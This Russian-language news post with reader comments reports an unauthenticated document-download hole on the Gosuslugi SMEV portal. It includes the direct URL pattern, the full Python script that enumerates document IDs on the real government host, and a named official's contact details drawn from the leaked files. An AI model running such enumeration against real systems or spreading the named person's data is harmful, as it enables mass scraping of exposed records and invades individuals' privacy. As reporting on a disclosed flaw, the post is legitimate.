Дыра на портале «Госуслуги»: внутренние документы лежат в открытом доступе

    Специалист по безопасности Александр Литреев рассказал об уязвимости на портале «Госуслуги».

    Оказалось, что внутренние документы чиновников с их персональной информацией открыты для свободного доступа. «Абсолютно _ВСЯ_ база рабочих документов, касающихся интеграции лежит в открытом доступе, — пишет Литреев. — Она никак не зашифрована, не имеет никакой авторизации/аутентификации и, в принципе, скачать её может абсолютно кто угодно».

    Посмотреть любой документ в базе можно по прямой ссылке такого вида:

    http://smev.gosuslugi.ru/portal/api/files/get/XXXXX
    где XXXXX — порядковый номер документа в системе.

    Например, по запросу /files/get/10484 скачивается таблица Excel под названием МВ ответственные.xlsx, в которой содержится информация обо всех лицах, ответственных за интеграцию. В списке указаны ФИО, должность, служебные и личные мобильные телефоны, адрес электронной почты для связи по вопросам интеграции.



    Александр Литреев напоминает, что на разработку портала «Госуслуги» было потрачено более 495 миллионов рублей. Ресурс позиционируется как централизованный сервис взаимодействия с различными государственными службами и органами — с помощью него можно оформить паспорт/загранпаспорт, водительское удостоверение, получить справку об отсутствии судимости и многое другое. По данным Минкомсвязи, по состоянию на апрель 2019 года на портале были зарегистрированы 86,5 млн россиян.

    К системе подключены практически все ведомства страны, в том числе ФСБ, министерство обороны, МВД и другие.

    Для интеграции данных из разных источников на портале организована Система Межведомственного Электронного Взаимодействия (СМЭВ), через которую подключаются все региональные и федеральные органы. Именно эта часть портала не защищена. Прямо сейчас документы с портала http://smev.gosuslugi.ru/ находятся в открытом доступе.

    «Естественно, не составляет никакого труда написать скрипт, который обеспечит перебор всех таких адресов и выгрузит все такие документы, что уже успели сделать энтузиасты из одного соседнего государства», — пишет Литреев.

    Хакерская группа THack3forU выложила на Github питоновский скрипт для поиска валидных URL с документами.

    В общем-то, скрипт довольно простой:

    import urllib.request
    from urllib.error import URLError, HTTPError
    a=1
    s=[]
    code=0
    b=range(1, 999999)
    for a in b:
       if a <= 9:
          s.append("".join(("http://smev.gosuslugi.ru/portal/api/files/get/00000",a.__str__())))
       elif a <= 99:
          s.append("".join(("http://smev.gosuslugi.ru/portal/api/files/get/0000",a.__str__())))
       elif a <= 999:
          s.append("".join(("http://smev.gosuslugi.ru/portal/api/files/get/000",a.__str__())))
       elif a <= 9999:
          s.append("".join(("http://smev.gosuslugi.ru/portal/api/files/get/00",a.__str__())))
       elif a <= 99999:
          s.append("".join(("http://smev.gosuslugi.ru/portal/api/files/get/0",a.__str__())))
       elif a <= 999999:
          s.append("".join(("http://smev.gosuslugi.ru/portal/api/files/get/",a.__str__())))
    for i in range(len(s)):
       try:
          sitecode=urllib.request.urlopen(s[i]).getcode()
          if sitecode == 200:
             print(s[i],"Nice Url!")
             f = open('good.txt', 'a')
             f.write(s[i] + '\n')
             f.close()
       except urllib.error.HTTPError as e:
          if e.code == 500:
             print(s[i],"Invalid Url!")
          else:
             print(s[i],"Error:",e.code)

    Файлы доступны и в поиске Google.

    Александр Литреев просмотрел некоторые документы в базе и нашёл несколько любопытных деталей. Например, руководитель подразделения межведомственного взаимодействия ФСБ Мелин Александр Васильевич использует личную почту на Mail.ru.
    Поделиться публикацией

    Комментарии 36

      +7
      Вообщем-то система так и работает, как должна, все кто мог сделать лучше уехали.
        +3
        Из какой страны пишете?
        +4
        Никогда такого не было, и вот опять…
        А вообще грустно от этого.
          0
          «Большинство pоссийских систем автоматизации-это полные вилы =(»
          © 2005 [Moderator of Ru.1CSoft] [LESHY-RIPN]

          Так что ударим нашим собственным Викиликсом по бездорожью и разгильдяйству.
            +3
            Ой, все, такие же вилы по всему миру. Кто щупал американский QuickBooks, к примеру, тот поймет.
          +3
          Создатели этого чуда наверняка на Хабре сидят… Есть что сказать?
            +2
            Эх.
            Сайт выключили.
            Обидно.
            Столько интересной инфы пропало.
            Может кто-нибудь успел написать скрипт?
              +1

              Пишут же, что успели. Да и наверняка выгрузили

                +2
                А ссылка есть?)
                +5

                Перед такими постами сначала все
                и выкачивают

                0
                Открытая техническая документация (доступная тут: smev3.gosuslugi.ru/portal) на государственном портале находится в открытом доступе. «Хакеры» делятся скриптами для загрузки открытых документов и теперь будут гордо изучать документацию к системе. На техническом ресурсе Хабр это подают как сенсацию и в комментариях обсуждают как «в этой стране» всё плохо.

                Ну да, в интернете всё как обычно.

                Единственное, что «не так» — в оригинальной статье нашли список емеилов ответственных лиц, и некоторые пользуются личными, а не корпоративными адресами с меил ру. Это действительно прокол, который, надеюсь, исправят.
                  +3
                  Т.е. проще говоря, все эти документы и подразумевались как доступные для скачивания всем желающим?
                    +1
                    Единственное, что «не так» — в оригинальной статье нашли список емеилов ответственных лиц, и некоторые пользуются личными, а не корпоративными адресами с меил ру.

                    Это точно.

                    Я понимаю, если бы нашли документ, подтверждающий, что вся команда Хабра работает на ФСБ, а Ализар вообще двойной агент. Вот это было бы интересно!
                    +6
                    А format отменили?
                    if a <= 9:
                          s.append("".join(("http://smev.gosuslugi.ru/portal/api/files/get/00000",a.__str__())))
                       elif a <= 99:
                          s.append("".join(("http://smev.gosuslugi.ru/portal/api/files/get/0000",a.__str__())))
                      +1

                      Как и str.fill()

                        +3
                        opensource как профдеформация :)
                        Увидел код, на автомате пофиксил баги, оптимизировал пару функций.
                        –1

                        Я не знаю как насчет внутренних документов, но портал Госуслуг это наверное у нас единственный портал, на который можно попасть в личный кабинет из любой операционной системы с авторизацией на сертификатвх при условии хранения сертификата и его закрытого ключа на токенах PKCS#11 с поддержкой российской криптографии.

                          +3
                          это пока не вылезет наружу что туда можно войти и без всяких токенов)
                            +1

                            И вообще без креденшлов. :)

                              0

                              Да, вы правы, можно и без токенов. И это печально.

                            +4
                            По данным Минкомсвязи, по состоянию на апрель 2019 года на портале были зарегистрированы 86,5 млн россиян.

                            Довольно жизнеутверждающее число, при том что в России навскидку живет около 140 миллионов человек, не все из которых имеют российское гражданство.

                            Ну а про заветы китайского программирования на Python выше уже высказались.
                              0
                              Ну я например два раза зарегистрирован. Один раз с ошибочными данными, но удалить дубликат очень непросто оказалось.
                                0
                                Если перефразировать как «86.5 млн учетных записей», то вполне верю. Работников госучреждений там регистрировали в добровольно-принудительном порядке (а таковых у нас очень много), многим людям пришлось создавать вторую учетку, т.к. поначалу не все сотрудники МФЦ умели подтверждать личность, не регистрируя для этого человека заново. Да и вообще, 30% скидка на почти все пошлины и возможность записаться на прием к врачу, например, заставили меня зарегистрировать там своего отца, которому уже 70+ и в целом ему «этот ваш интернет… не нужон»
                                  0
                                  Подозреваю, что многие там оказались вынужденно. Наше государство привыкло действовать методами «а кто не купит — отключим газ». Например я там зареган исключительно потому, что когда получал права необходимо было записаться на экзамен исключительно через ГО. Почему это не могла сделать сама школа, при том, что она всё равно подаёт все документы сама — вопрос. На получение самой карточки записаться без ГО тоже было невозможно.
                                  Т.е. реально нафиг мне он не сдался, но в статистике — я счастливый пользователь.
                                  Кстати когда получал предыдущие права — такая же хрень была с PGU, и там я тоже радую статистику, а по факту…
                                    +1
                                    Т.е. реально нафиг мне он не сдался

                                    Что-то вы с того конца проблемы зашли. Надо было начинать: «государство заставило меня права получать, которые мне нафиг не нужны, я и так ездить умею».
                                      0
                                      Неудачный пример. Необходимость прав вполне очевидна любому, кто близко подходил к автомобильной дороге. А вот какова во всём этом необходимость ГО кроме пункта «натянуть статистику»? Хотя понимаю, для некоторых это тоже очень важная вещь.
                                        +1
                                        Необходимость иметь сайт госуслуг тоже вполне очевидна любому, кто хотя бы раз стоял в очереди на сдачу документов, получение справок и т.д.
                                          0
                                          Вы не слишком внимательно читали мой комментарий.
                                          1. Я нигде не отрицал его необходимость.
                                          2. Речь была про то, что статистика не соответсвует реальным потребностям в нём, т.к. некоторых (уже упомянуты госслужащие, например) туда загоняют насильно.
                                          3. Проблема очередей сейчас неплохо решается электронной очередью, в которою сюрприз-сюрприз иногда невозможно попасть иначе, чем через ГО. Хотя есть терминалы, но они выдают пяток квитков в день. Конкретно мой случай — при попытке получить бумажку в терминале было сказано, что автомат выдаёт 7 (семь!) штук в день. Ага, на очередь минимум человек 40.
                                            +1
                                            что статистика не соответсвует реальным потребностям

                                            Статистика даже преуменьшает реальные потребности, потому что 100% населения рано или поздно начинает использовать государственные услуги.

                                            То, что часть людей из-за лени, по каким-то идеологическим, параноидальным, религиозным и другим причинам не хочет пользоваться цифровизацией — это проблема для государства.

                                            Потому что чем больше людей пользуется электронными услугами, тем быстрее решаются дела, меньше накладные расходы, больше потребности в квалифицированных кадрах, более точная статистика и прочее, прочее, прочее…

                                            Чем дальше человек будет отстранен от функционирования гос-системы, тем меньше коррупции и злоупотреблений будет, и тем больше будет справедливости в мире. А ушлые товарищи используют терминалы электронной очереди, что бы нахватать тикетов, а потом перепродать место в очереди.

                                            И в заключение. Чем раньше общество начнет пользоваться электронными услугами, тем быстрее система пройдет этапы эволюции и развития, и тем быстрее мы получим максимально беспроблемную систему. Система, которой не пользуются — не развивается и не совершенствуется.

                                            Поэтому, я полностью поддерживаю «принудительное» привлечение населения к использованию госуслуг.
                                  –1
                                  руководитель подразделения межведомственного взаимодействия ФСБ Мелин Александр Васильевич использует личную почту на Mail.ru.

                                  А почему бы ему не иметь почту на серверах «дочерней структуры»? Ему же не надо опасаться, что товарищ майор прочитает.
                                    +1
                                    А почему в приведенном в конце документе есть данные по ФМС? ФМС переформировали/переформатировали/переименовали в ОВМ МВД уже несколько лет назад. Это устаревшие данные?
                                      0
                                      Для тех, кто не любит скрипты, но хочет глянуть на доки
                                      ссылочка

                                      Скрипт на скачку рандомных доков можно создать в одну строчку, используя John The Ripper+ bash 2строчки.
                                      Через хМб прилетает временный бан от сайта.
                                        +1
                                        Да это мусор. Ценности не представляет.
                                        Хотя сам факт наличия подобной дыры говорит о «профессионалах», которые этим занимаются.
                                          –1
                                          Дыра на портале «Госуслуги»: внутренние документы лежат в открытом доступе
                                          Очередная среди многих.

                                          И на фоне всего этого так весело выглядят заманухи для народа по регистрации на госуслугах — вот вам скидка на пошлины, через госуслуги и тд и тп. ХРЕН вам! Я лучше заплачу больше пошлину, чем солью свои документы ещё раз (глядя как относятся к личной информации в государстве в целом, понимаю что уже всё слито неоднократно).

                                          Например, по запросу /files/get/10484 скачивается таблица Excel под названием МВ ответственные.xlsx, в которой содержится информация обо всех лицах, ответственных за интеграцию.
                                          Они хорошо интегрировали свои данные по многим местам в сети, о которых и сами не знают.
                                          Александр Литреев напоминает, что на разработку портала «Госуслуги» было потрачено более 495 миллионов рублей.
                                          Я и за меньшую сумму могу все документы на открытый файлообменник выложить. Поэтому считаю что кто-то просто хорошо нажился на всём этом.

                                          Судя по ситуации фразу ''К системе подключены практически все ведомства страны, в том числе ФСБ, министерство обороны, МВД и другие.'' надо читать как ''К системе подключены практически все ведомства страны, в том числе ФСБ, министерство обороны, МВД и другие, произвольные никому неизвестные люди''
                                            +2
                                            Ничего, что на ВСЕ эти документы есть ссылка на главной странице smev.gosuslugi.ru?
                                              0
                                              Портал ГосУслуги, лично для меня, оказался очень полезным. Раньше в паспортном столе сделать что-то было настоящей пыткой с продолжением. Сейчас же, онлайн записался, взял онлайн список нужных бумаг, отнёс бумаги (без очереди). Через 12 дней получил новенький паспорт с пропиской (опять без очереди) для дочери на 14 лет.

                                              Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.

                                              Самое читаемое